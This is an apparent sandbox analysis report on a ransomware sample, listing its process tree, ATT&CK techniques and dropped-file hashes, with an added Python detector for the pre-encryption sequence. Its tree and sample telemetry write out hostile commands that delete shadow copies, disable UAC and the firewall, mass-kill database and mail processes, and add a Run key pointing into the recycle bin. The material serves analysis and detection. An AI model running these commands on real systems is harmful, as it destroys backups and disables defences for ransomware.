   C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f

3⤵ C:\Windows\SysWOW64\reg.exe
   reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
   - Adds Run key to start application
   - Modifies registry key

3⤵ C:\Windows\SysWOW64\reg.exe
   reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
   - Adds Run key to start application
1⤵ C:\Windows\system32\vssvc.exe
   C:\Windows\system32\vssvc.exe
   - Suspicious use of AdjustPrivilegeToken

1⤵ C:\Windows\system32\taskmgr.exe
   "C:\Windows\system32\taskmgr.exe" /4
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious behavior: GetForegroundWindowSpam
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of FindShellTrayWindow
   - Suspicious use of SendNotifyMessage

1⤵ C:\Windows\explorer.exe
   "C:\Windows\explorer.exe"

1⤵ C:\Windows\system32\NOTEPAD.EXE
   "C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt

1⤵ C:\Windows\SysWOW64\mshta.exe
   "C:\Windows\SysWOW64\mshta.exe" "C:\ReadMe_Now!.hta"
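The cmd.exe chains in the tree above are the usual ransomware pre-encryption sequence: turn UAC off (EnableLUA=0), destroy Volume Shadow Copies two ways (vssadmin and wmic), disable Windows Firewall, kill database, mail and Office processes so their files are no longer locked, then persist through a Run key that points into C:\$Recycle.Bin. The detector below is an added example, not part of this sandbox report or of the sample; it runs a small rule set over process-creation records (constructed here to mirror the tree; the pid/ppid/image/cmdline field names are this example's assumption, roughly Sysmon EID 1 shape) and reports each behaviour, treating taskkill as a finding only when many distinct targets are killed under one parent and some of them are file-locking services.

```python
"""Detection logic for the pre-encryption command chain shown in the process tree.

Added example, not part of the sandbox report. Scans process-creation records
(constructed below) for shadow-copy deletion, UAC disabled via EnableLUA=0,
Windows Firewall disabled, a taskkill burst against database/mail/Office
processes, and a Run key pointing into $Recycle.Bin. Field names
(pid, ppid, image, cmdline) are assumptions of this example.
"""
import json
import re
from collections import defaultdict

# One entry per behaviour; the patterns are derived from the command lines above.
RULES = {
    "shadow_copy_deletion": [
        re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
        re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I),
    ],
    "uac_disabled": [
        re.compile(r"\breg(?:\.exe)?\s+add\b.*\\Policies\\System\b.*\bEnableLUA\b.*/d\s+0\b", re.I),
    ],
    "firewall_disabled": [
        re.compile(r"\bnetsh(?:\.exe)?\s+advfirewall\s+set\s+\w*profiles?\s+state\s+off\b", re.I),
        re.compile(r"\bnetsh(?:\.exe)?\s+firewall\s+set\s+opmode\s+mode=disable\b", re.I),
    ],
    "run_key_in_recycle_bin": [
        re.compile(r"\breg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run\b.*\$Recycle\.Bin\\", re.I),
    ],
}

# Extracts every taskkill /im target from a command line; tolerates an optional /f.
TASKKILL_RE = re.compile(r"\btaskkill(?:\.exe)?\s+(?:/f\s+)?/im\s+([\w.-]+)", re.I)
# Processes whose termination releases file locks the encryptor needs (subset of the tree above).
KILL_WATCHLIST = {
    "sqlservr.exe", "sqlagent.exe", "sqlwriter.exe", "mysqld.exe", "oracle.exe",
    "sqbcoreservice.exe", "outlook.exe", "thunderbird.exe", "winword.exe", "excel.exe",
}
TASKKILL_THRESHOLD = 5  # distinct targets under one parent before it counts as a burst


def match_rules(cmdline):
    """Names of RULES that match a single command line, sorted for stable output."""
    return sorted(name for name, pats in RULES.items() if any(p.search(cmdline) for p in pats))


def taskkill_targets(cmdline):
    """Image names passed to taskkill /im within one command line (lower-cased)."""
    return [t.lower() for t in TASKKILL_RE.findall(cmdline)]


def analyze(events):
    """Map rule name -> evidence over a list of process-creation records."""
    findings = defaultdict(list)
    kills_by_parent = defaultdict(set)
    for ev in events:
        for name in match_rules(ev["cmdline"]):
            findings[name].append(ev["cmdline"])
        for target in taskkill_targets(ev["cmdline"]):
            kills_by_parent[ev["ppid"]].add(target)
    # A single taskkill is routine; many distinct targets under one parent,
    # including file-locking services, is the ransomware pattern.
    for ppid, targets in kills_by_parent.items():
        hits = targets & KILL_WATCHLIST
        if len(targets) >= TASKKILL_THRESHOLD and hits:
            findings["mass_process_kill"].append(
                {"ppid": ppid, "distinct_targets": len(targets), "watchlist_hits": sorted(hits)})
    return dict(findings)


# Constructed sample telemetry mirroring the tree above (pids are arbitrary).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 10, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": (r"cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
                 r"/v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet"
                 r"&wmic shadowcopy delete&netsh advfirewall set currentprofile state off")},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\SysWOW64\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"pid": 102, "ppid": 100, "image": r"C:\Windows\SysWOW64\netsh.exe",
     "cmdline": "netsh firewall set opmode mode=disable"},
    *[{"pid": 200 + i, "ppid": 150, "image": r"C:\Windows\SysWOW64\taskkill.exe",
       "cmdline": f"taskkill /im {name}"}
      for i, name in enumerate(["sqlservr.exe", "sqlagent.exe", "mysqld.exe",
                                "outlook.exe", "winword.exe", "excel.exe"])],
    {"pid": 300, "ppid": 10, "image": r"C:\Windows\SysWOW64\reg.exe",
     "cmdline": (r"reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update "
                 r"/t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f")},
    # Benign noise that must stay quiet: listing shadow copies, one stray taskkill.
    {"pid": 400, "ppid": 11, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},
    {"pid": 401, "ppid": 11, "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /im notepad.exe"},
]

if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_EVENTS), indent=2))
```

The Run-key rule keys on the $Recycle.Bin path rather than on the value name, since the name (Machin_Update) is trivially changed while no legitimate software autostarts from the recycle bin. The final netsh line in the tree (enabling the "Network Discovery" rule group) is deliberately left out of the rule set: on its own it is an ordinary administrative action and is better used as corroborating context next to the firewall-off finding than as a detection in its own right.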
Network
MITRE ATT&CK Matrix (ATT&CK v6)

Persistence
- Modify Existing Service: 1
- Registry Run Keys / Startup Folder: 1
- Scheduled Task: 1

Defense Evasion
- Bypass User Account Control: 1
- Disabling Security Tools: 1
- Modify Registry: 3
- File Deletion: 2
Downloads

C:\Read_Me!_.txt
  MD5    afa801e9f586814b53da66d6196c720f
  SHA1   12f99bbd9511b0019b536a93d06d1bbf08ac61ef
  SHA256 a051c413afada6b6506e4095ad94a9016ba48b675a2596473dd1dcf57dcbc410
  SHA512 c220e8ba63eadef8cfa866939a201f6a324452516f97aa084e87db0a2bb676c6f16dea7d9ce799f8cf709858adbbcb14678f0299ad0eaad8e615be204b00637e

C:\Users\Admin\AppData\h4_svc.bat
  MD5    ead5cad574fa019df970900e07e76afd
  SHA1   2bf7be0a9b3f174eaccd0a89310699f7b15fed02
  SHA256 7de41bf6be3b821fb2ff4a2f8b7f6772d407c0bdf1bccfd9c19207ab1f07440f
  SHA512 16aa662012c6ed8c50cb45f0487ff10081201c0091ccd86b4ae5235e72ef696a188f9acb5f91e8a59b95cac7b5d8b1c89328f32714f51d201db94e0a0aae5c87

C:\Users\Admin\AppData\t2_svc.bat
  MD5    702f5dc6f9dec28c8c9b7b6885c9fe09
  SHA1   dbb85da6de899deb21ce0a8f25c1726cd19e49e8
  SHA256 20bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9
  SHA512 fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7

C:\Users\Admin\AppData\v9_svc.vbs
  MD5    e9c50acda9063b2462697bdbd0a0dfe2
  SHA1   d1a2bc54905ce0e9121f8e5c249e0527f2190b7e
  SHA256 f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd
  SHA512 d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9

memory/796-59-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp
  Filesize 8KB

memory/1604-53-0x0000000075531000-0x0000000075533000-memory.dmp
  Filesize 8KB